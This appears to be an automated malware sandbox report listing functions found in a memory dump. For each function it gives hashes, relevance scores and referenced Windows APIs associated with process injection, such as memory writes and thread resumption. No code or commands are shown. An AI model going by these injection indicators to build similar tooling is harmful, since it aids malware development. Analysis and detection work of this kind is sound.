Opcode ID: f3343e5e3348bf6a8e653adc946599e6c506b437caeeec6f84b47f9f15d8c8d3
Instruction ID: 0b8bdb1ab9d98fad9e3ba1b63fafdd829df124f1a2eae040d6c2aa27e432869c
Opcode Fuzzy Hash: f3343e5e3348bf6a8e653adc946599e6c506b437caeeec6f84b47f9f15d8c8d3
Instruction Fuzzy Hash: 9491BE706047869BDF339E2888A87EEB7E6AF46350F94812ECC8897645C3354A85DB53

Uniqueness

Uniqueness Score: -1.00%

Function 020B4F8C, Relevance: 1.7, APIs: 1, Instructions: 235nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 8ac41b8fc2c0138df8b2bb64ee4d593d34a30e09ec377a211dec309d42791144
Instruction ID: 8369c167268202334142320bcd8459bfe763b7b45fcdee6502d5ddfa6374a3cf
Opcode Fuzzy Hash: 8ac41b8fc2c0138df8b2bb64ee4d593d34a30e09ec377a211dec309d42791144
Instruction Fuzzy Hash: AD9171316043089FEB768E24CD807EE7BB2FF56350FA1816DDD88AB260C3314A85DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B4FB8, Relevance: 1.7, APIs: 1, Instructions: 230nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: a3648028e49144634593111fb048301dd0782cf68c30c8f95ef96ea3a5a6044b
Instruction ID: 0742eff07020850aa5b32f56c79f306916f1190eb22d518bf7b898bd7caaa93c
Opcode Fuzzy Hash: a3648028e49144634593111fb048301dd0782cf68c30c8f95ef96ea3a5a6044b
Instruction Fuzzy Hash: E39140716043489FEF768E24CD807EA3BB2FF5A344F95816DED88AB260C7314985DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B1204, Relevance: 1.7, APIs: 1, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0152ae86f41f12f0fe6508227cf699d7ba84f450eeaa393a1ae1d09ed1ab8492
Instruction ID: 9b3b961176c5bbe5db3977886fb633c4bb1c72f63025481e024965ace8cc8a45
Opcode Fuzzy Hash: 0152ae86f41f12f0fe6508227cf699d7ba84f450eeaa393a1ae1d09ed1ab8492
Instruction Fuzzy Hash: 11718D70504386ABDF339E288C983EEBBE6AF4A350F94812ECC89D7655C3354985DB53

Uniqueness

Uniqueness Score: -1.00%

Function 020B5023, Relevance: 1.7, APIs: 1, Instructions: 206nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: d4c930d6a05055a3f516aec41cdcdfaa23675109aa3bd2824105a40cbb14c434
Instruction ID: f631cc4e05801e5f10b962dea7cc8f2ebfdf62c8016be8471ca3feb44ed3b68d
Opcode Fuzzy Hash: d4c930d6a05055a3f516aec41cdcdfaa23675109aa3bd2824105a40cbb14c434
Instruction Fuzzy Hash: 4A812E712043499FEB768E24CD807E97BB2FF56344FA0816CED899B2A0C7714985DB02

Uniqueness

Uniqueness Score: -1.00%

Function 020B1265, Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33dd9899e9db9847afbe65cd204d423c1c74b03ab760de80e8944825bc73cd4d
Instruction ID: b958b94e5111e538e278ded78a66cc027cd5967b3d1b0d1b120e4210bdf79365
Opcode Fuzzy Hash: 33dd9899e9db9847afbe65cd204d423c1c74b03ab760de80e8944825bc73cd4d
Instruction Fuzzy Hash: 756169705043869BDF339E3888987EEBBE2AF4A350F94812ECC8997645C3758985DB53

Uniqueness

Uniqueness Score: -1.00%

Function 020B506F, Relevance: 1.7, APIs: 1, Instructions: 190nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 28f6e0fe94470fba58386ba46797c12fc13380d16d42f4c67c6271ac8da29835
Instruction ID: d1a57db956279d8aad966137e832a236740f3fdf769e1f90c14c33264f0176bb
Opcode Fuzzy Hash: 28f6e0fe94470fba58386ba46797c12fc13380d16d42f4c67c6271ac8da29835
Instruction Fuzzy Hash: A27100712043499FEB768E24CD807ED7BB2FF96354FA0812DED899B260D7714985DB02

Uniqueness

Uniqueness Score: -1.00%

Function 020B9951, Relevance: 1.7, APIs: 1, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d33cc01d70385698c1f5d5511ff9215d65b33f6d892cd308f6798f22b3d7be0e
Instruction ID: 1a891525ae7f5427310774093e5dfd8e43f0dd9fdf8bc4c0eb2bcddb28f9edec
Opcode Fuzzy Hash: d33cc01d70385698c1f5d5511ff9215d65b33f6d892cd308f6798f22b3d7be0e
Instruction Fuzzy Hash: 7251373160130CCFEB778E68CA917FD72E2AF96251F55852ACE4297218D339C485EF82

Uniqueness

Uniqueness Score: -1.00%

Function 020B98F3, Relevance: 1.7, APIs: 1, Instructions: 177librarynativethreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60
NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadResumeThread
String ID:
API String ID: 1876017897-0
Opcode ID: 88e98a1f8430541575921c642e46f95821822a136b47c84bc5ebad88097ab50e
Instruction ID: 7baeaf90af267baedf6026c6a3a3bc4a0e626904f39a33d972618fb84f2d3507
Opcode Fuzzy Hash: 88e98a1f8430541575921c642e46f95821822a136b47c84bc5ebad88097ab50e
Instruction Fuzzy Hash: C2512631601308CFEB779E68C5917FD73E2AF96255F15852ADE42D7218E339C881EE82

Uniqueness

Uniqueness Score: -1.00%

Function 020B98D8, Relevance: 1.7, APIs: 1, Instructions: 175librarynativethreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60
NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadResumeThread
String ID:
API String ID: 1876017897-0
Opcode ID: 0a83698d804c8efd401a53b46eb1e015764eb0bbe5f62ebd32f0a0cd3328c5e0
Instruction ID: b3ac68c53d944e6a23e37407c7dcca2cb60f2c1ba1bd968a31898bd892d3791c
Opcode Fuzzy Hash: 0a83698d804c8efd401a53b46eb1e015764eb0bbe5f62ebd32f0a0cd3328c5e0
Instruction Fuzzy Hash: 0651283160530CCFEB778E68C6A03FD72A2AF96351F55852ADE0297118D329C485EE41

Uniqueness

Uniqueness Score: -1.00%

Function 020B50C5, Relevance: 1.7, APIs: 1, Instructions: 174librarynativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4
LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: 3a778af39bc61adb5add3f2d36fcdbd50077bd4365f3b6ba621a0aa628d98404
Instruction ID: e695c3787c2639945a55e4cbe63ea172a3f10940685c46b75d568ded3b801137
Opcode Fuzzy Hash: 3a778af39bc61adb5add3f2d36fcdbd50077bd4365f3b6ba621a0aa628d98404
Instruction Fuzzy Hash: 0061F0712053489FDB769F24CD80BE97BB2FF96350F50812CED899B260D7719985DB02

Uniqueness

Uniqueness Score: -1.00%

Function 020B12DC, Relevance: 1.7, APIs: 1, Instructions: 173COMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

TerminateProcess.KERNELBASE(-EC8977D8,31F36B16), ref: 020B5835

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: 3587cf1526ae41130d7195ba317e18d6c28d8a07aa5974241fe09f946d83a1ec
Instruction ID: b3a07ee4e2483dfa39a4f3e905d526a98b77ea95324acb5af2637a1fcf2cf47e
Opcode Fuzzy Hash: 3587cf1526ae41130d7195ba317e18d6c28d8a07aa5974241fe09f946d83a1ec
Instruction Fuzzy Hash: A8516B71504785DBDF328E388C947DEBBE2AF86310F94816ECC8D9B645C3748549DB52

Uniqueness

Uniqueness Score: -1.00%

Function 020B996E, Relevance: 1.7, APIs: 1, Instructions: 166librarynativethreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60
NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadResumeThread
String ID:
API String ID: 1876017897-0
Opcode ID: 83b8e36bd41b3a20161f4650357af35adf2e5c53ab721526c635b1a7020f7bfd
Instruction ID: 6aa75ff2697f07d8a69ab954ccaa844331149ed24d5085fce279eb91c7fcdd9f
Opcode Fuzzy Hash: 83b8e36bd41b3a20161f4650357af35adf2e5c53ab721526c635b1a7020f7bfd
Instruction Fuzzy Hash: 2E51253160530CCFEB779E78CAA07FD72A2AF86351F16852ACE0297119D339C581EE81

Uniqueness

Uniqueness Score: -1.00%

Function 020B1313, Relevance: 1.7, APIs: 1, Instructions: 165COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-EC8977D8,31F36B16), ref: 020B5835

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: abfb98a676a48bc6bf1494ce6f7ed4ce0c36c3b31cbd50d5c0e19239cb3b9ccd
Instruction ID: bb8171c49559dac9c24961677c2455d5128d4bc29b070e28bbc5f1dc30b3ceea
Opcode Fuzzy Hash: abfb98a676a48bc6bf1494ce6f7ed4ce0c36c3b31cbd50d5c0e19239cb3b9ccd
Instruction Fuzzy Hash: 435188716087859BEF328F388C943DEBBE2AF46310F94816ECC889B645C3745589DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B995D, Relevance: 1.7, APIs: 1, Instructions: 165librarynativethreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60
NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadResumeThread
String ID:
API String ID: 1876017897-0
Opcode ID: 867739b80024929fcd5e2ddc9764a05a8ac7d2264883ef9ae1015981c2bc6b0e
Instruction ID: c1d6c437785adab0f790e8d54759d18bd0b096c527d242d7b4090e869745de05
Opcode Fuzzy Hash: 867739b80024929fcd5e2ddc9764a05a8ac7d2264883ef9ae1015981c2bc6b0e
Instruction Fuzzy Hash: 3D51163150430CCEEB779A74CAA03FD76A2AF86351F56852ACE029B119D379C481EE81

Uniqueness

Uniqueness Score: -1.00%

Function 020B9933, Relevance: 1.7, APIs: 1, Instructions: 164librarynativethreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60
NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadResumeThread
String ID:
API String ID: 1876017897-0
Opcode ID: 640f10991b0973350a70067b3f65499b527aff0068654b4fad1f6591042201d1
Instruction ID: dde7bccd721e088f026059d6f87aad3fabb88b243d9ba5fcb0be991e000cf5f8
Opcode Fuzzy Hash: 640f10991b0973350a70067b3f65499b527aff0068654b4fad1f6591042201d1
Instruction Fuzzy Hash: 8C51163160530CCFEB778E68C6A17FD72A2AF96215F55852ACE02D7119E339C481EE82

Uniqueness

Uniqueness Score: -1.00%

Function 020B999B, Relevance: 1.7, APIs: 1, Instructions: 160librarynativethreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60
NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadResumeThread
String ID:
API String ID: 1876017897-0
Opcode ID: d8242165d1b6d7702e587438f0d1e827c4b0c2f30c0b6aee41fb085a0f5a0cc2
Instruction ID: 086c02fcf670cd054bcfd384996b15b16f6debbbc134b01ac64451afa62319fb
Opcode Fuzzy Hash: d8242165d1b6d7702e587438f0d1e827c4b0c2f30c0b6aee41fb085a0f5a0cc2
Instruction Fuzzy Hash: BA511331605308CFEB778E68CAD07E972E2AF86315F55852ADE42DB119D339C881EF81

Uniqueness

Uniqueness Score: -1.00%

Function 020B136B, Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(-EC8977D8,31F36B16), ref: 020B5835

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: cfec4c216577f6adb87230e1f120bacf3bd51636001ae65e0d242f2e7b8d0529
Instruction ID: b09a0bfecde9be7f7804eea5ee4c841417799940a4237f69da957612c8d3039c
Opcode Fuzzy Hash: cfec4c216577f6adb87230e1f120bacf3bd51636001ae65e0d242f2e7b8d0529
Instruction Fuzzy Hash: ED5168715087859BDF328F38CD583EEBBA2AF46310F94816ECC889B645C3745589DB52

Uniqueness

Uniqueness Score: -1.00%

Function 020B5146, Relevance: 1.6, APIs: 1, Instructions: 149librarynativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4
LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: 97bb6e9a04ed104a206143aabf36dc54252ee4966b8eaacc20bd3c589fc454ad
Instruction ID: 195817f8c4063aeba6df12b6fa10287d3671e50421ff60b1bf444ab2da7a8562
Opcode Fuzzy Hash: 97bb6e9a04ed104a206143aabf36dc54252ee4966b8eaacc20bd3c589fc454ad
Instruction Fuzzy Hash: 6851DDB16043489FEB768F24CD80BE97BB2FF96350F50812CED899B250D7718985DB01

Uniqueness

Uniqueness Score: -1.00%

Function 020B5CB3, Relevance: 1.6, APIs: 1, Instructions: 146memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtAllocateVirtualMemory.NTDLL ref: 020B5EEC

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: ebbbcec724d0442dda8d12210eccc930794bb20d76608d4b276bb35949f51d23
Instruction ID: 2bf7a62e1ba39872ed7d343bea57b179adea2c6614fd55c345cb9ce0b2c08f9b
Opcode Fuzzy Hash: ebbbcec724d0442dda8d12210eccc930794bb20d76608d4b276bb35949f51d23
Instruction Fuzzy Hash: 6B51E27160834ACFDB316E64CDA53EE7BB2EF163A0F85045ADCCA97154E3308A85DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B99E9, Relevance: 1.6, APIs: 1, Instructions: 146librarynativethreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60
NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadResumeThread
String ID:
API String ID: 1876017897-0
Opcode ID: 93ce5e73ca552499b0b0e4d4b7eec5f3d9317abec9bed37bde5ecdd3137ea8c5
Instruction ID: 4e2871c4598bb24779edf2e828ebb2b3f50cbae51c548981505dfd9ce7971036
Opcode Fuzzy Hash: 93ce5e73ca552499b0b0e4d4b7eec5f3d9317abec9bed37bde5ecdd3137ea8c5
Instruction Fuzzy Hash: 5F411531601308CFEB779E78CA907E972E2AF86311F56852ADE02D7119D339C481EE85

Uniqueness

Uniqueness Score: -1.00%

Function 020B9A03, Relevance: 1.6, APIs: 1, Instructions: 142librarynativethreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60
NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadResumeThread
String ID:
API String ID: 1876017897-0
Opcode ID: 0d7a901e7ecf5d48def5a135b407ee5199e6486dac7c8ced34e9102d2c21c442
Instruction ID: 13ec10eb98ed22df0a43a4d6ded11b6c74c3096064a7a15fe8e2698341f23948
Opcode Fuzzy Hash: 0d7a901e7ecf5d48def5a135b407ee5199e6486dac7c8ced34e9102d2c21c442
Instruction Fuzzy Hash: B5411531600308CFEB779E78CA907EA72A2AF96315F56852ADE0287119D339C481EE85

Uniqueness

Uniqueness Score: -1.00%

Function 020B5CD9, Relevance: 1.6, APIs: 1, Instructions: 141memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtAllocateVirtualMemory.NTDLL ref: 020B5EEC

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: f55de142828202a5060ebdabe4e680f699c951f14a69f6c0979913cc943e372d
Instruction ID: 1aaca0b488acc4f1474b27251cc0ffb3251e82ba07390edd780accb9dfc2ef00
Opcode Fuzzy Hash: f55de142828202a5060ebdabe4e680f699c951f14a69f6c0979913cc943e372d
Instruction Fuzzy Hash: 1E51277160834ACFDB316E64CD953EE7BB2EF063A0F85055ADCCA97150E3308A85DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B5CE4, Relevance: 1.6, APIs: 1, Instructions: 141memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtAllocateVirtualMemory.NTDLL ref: 020B5EEC

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: bf73bb9ecc5cf9fd1ed8b44c278216c600e31d2941dace2b26c00d321812c5fd
Instruction ID: ed873b8934401af2b56706ffe75526d9ffdc4efa0e372b8e6dfc1e4220b80edc
Opcode Fuzzy Hash: bf73bb9ecc5cf9fd1ed8b44c278216c600e31d2941dace2b26c00d321812c5fd
Instruction Fuzzy Hash: 0651F37160934ACFDB31AE64DD553EA7BB2EF163A0F85045EDCC697250E3309985CB02

Uniqueness

Uniqueness Score: -1.00%

Function 020B5D71, Relevance: 1.6, APIs: 1, Instructions: 140memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 020B5EEC

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 16b90257dd77074a3665ed372950958a1d83905b60e7a0d15afc8f73dd58e7b5
Instruction ID: 6c08ffaa1e598686664cb767dbe2dfbce70b6f8b28c03d0f776852372d4d2470
Opcode Fuzzy Hash: 16b90257dd77074a3665ed372950958a1d83905b60e7a0d15afc8f73dd58e7b5
Instruction Fuzzy Hash: 8051453260874ACFDB356E64DD653EE7BB2EF1A3A0F850559DCCA97210E3309A85CB41

Uniqueness

Uniqueness Score: -1.00%

Function 020B518F, Relevance: 1.6, APIs: 1, Instructions: 140librarynativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4
LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: c9ed52e927591b1a85ba5cd78e4e5db55e77f3109aed5e2888192bd4f10918bb
Instruction ID: d3d70fdd0116aca31480aea84a9505f91297149a066d8dc161e135dbabc1dd20
Opcode Fuzzy Hash: c9ed52e927591b1a85ba5cd78e4e5db55e77f3109aed5e2888192bd4f10918bb
Instruction Fuzzy Hash: AE510E712043499FDB3A8F24CD80BE97BB2FF96350F60812CED899B260D7719985DB01

Uniqueness

Uniqueness Score: -1.00%

Function 020B9A57, Relevance: 1.6, APIs: 1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f1cf996846a272b79f24cca59b3509deb76d746d2eeb2483df5ac8481d1f549
Instruction ID: 59ac946d3a6ad0c4f1f6e27f1c9caec3684b8aab1bdd0aeefd8d60854b42c065
Opcode Fuzzy Hash: 6f1cf996846a272b79f24cca59b3509deb76d746d2eeb2483df5ac8481d1f549
Instruction Fuzzy Hash: F0410531601308CFEB7B8E78C9907EA72E2AF96305F568529DE42C7119D339C981EF85

Uniqueness

Uniqueness Score: -1.00%

Function 020B9A2F, Relevance: 1.6, APIs: 1, Instructions: 134nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4edb32d06bd1d2b926732057f69c42ddc680e86d8783ad45cc9b8eae46d4db00
Instruction ID: 65ae2f144e831e7e0e5092720b390200c48f5b15a33b53c3de241f437922cc23
Opcode Fuzzy Hash: 4edb32d06bd1d2b926732057f69c42ddc680e86d8783ad45cc9b8eae46d4db00
Instruction Fuzzy Hash: 1341063160130CCFEB778E34C6947FE76A2AF82315F56852ACE4287119D379C581EE85

Uniqueness

Uniqueness Score: -1.00%

Function 020B9A41, Relevance: 1.6, APIs: 1, Instructions: 132nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4ffae793f5a916d18139b70b3e56db2a70c8c2bda1a89294d7a2cd28f8a438c2
Instruction ID: 723fa922d9154c146d8b1c587f91e8a4b3bd55831dbf57e249ef55a197713818
Opcode Fuzzy Hash: 4ffae793f5a916d18139b70b3e56db2a70c8c2bda1a89294d7a2cd28f8a438c2
Instruction Fuzzy Hash: 0A412631601308CFEB778E74C9947EE72A2AF85311F568569DE02C7119D339C985EF85

Uniqueness

Uniqueness Score: -1.00%

Function 020B51C7, Relevance: 1.6, APIs: 1, Instructions: 131librarynativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4
LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: 412f7a60db713af3e8391ae7bfee1437ff1d8c7bdaecd5146cff47cf8f9ab4ff
Instruction ID: 4175393ce69d3074ed0f1fe44598de6070a05c8577988cda1dfef4ec95658142
Opcode Fuzzy Hash: 412f7a60db713af3e8391ae7bfee1437ff1d8c7bdaecd5146cff47cf8f9ab4ff
Instruction Fuzzy Hash: 9B41DDB12043499FDB7A9F24CD80BE97BB2FF96350F60812CED899B250D7719985AB01

Uniqueness

Uniqueness Score: -1.00%

Function 020B5D21, Relevance: 1.6, APIs: 1, Instructions: 130memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtAllocateVirtualMemory.NTDLL ref: 020B5EEC

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 7eff800c98c03adc6c58969f1590fdae2fd765c98fd92813b3897c0b394adf12
Instruction ID: 331c1688160cd6c1dcaad8c83079f61756f86e342a83c5f5e467f79a1233fe52
Opcode Fuzzy Hash: 7eff800c98c03adc6c58969f1590fdae2fd765c98fd92813b3897c0b394adf12
Instruction Fuzzy Hash: 3041F17160834ACFDB31AE64CD953EE7BB2EF06390F850559DCCA97220D3309985CB02

Uniqueness

Uniqueness Score: -1.00%

Function 020B9A74, Relevance: 1.6, APIs: 1, Instructions: 127nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 62cbfe5649fa719f1e9fd7fc3a7054e915c160c6a4ce8095d3d0fde5698d5aed
Instruction ID: 20199d6c5fe478bce234ded70fa81426733bdb99fcfd580b03b6746c51202b5c
Opcode Fuzzy Hash: 62cbfe5649fa719f1e9fd7fc3a7054e915c160c6a4ce8095d3d0fde5698d5aed
Instruction Fuzzy Hash: 30412731601308CFEB778E38C9947EA76E2AF95315F568569CE42CB119D338C981EF85

Uniqueness

Uniqueness Score: -1.00%

Function 020B9A95, Relevance: 1.6, APIs: 1, Instructions: 121nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c81d184d1377f43f4ae6ecece5740e9df13e84436c95091fa271c14cf527d5e5
Instruction ID: 98e855f6a6f5d67b1abb5a6989bd6b1308ac6799e4407db61c7ced6944aa1cb7
Opcode Fuzzy Hash: c81d184d1377f43f4ae6ecece5740e9df13e84436c95091fa271c14cf527d5e5
Instruction Fuzzy Hash: 24410031601308CFEB778E38CA947EA72E2AF85311F558569DE42CB219D339C981EF85

Uniqueness

Uniqueness Score: -1.00%

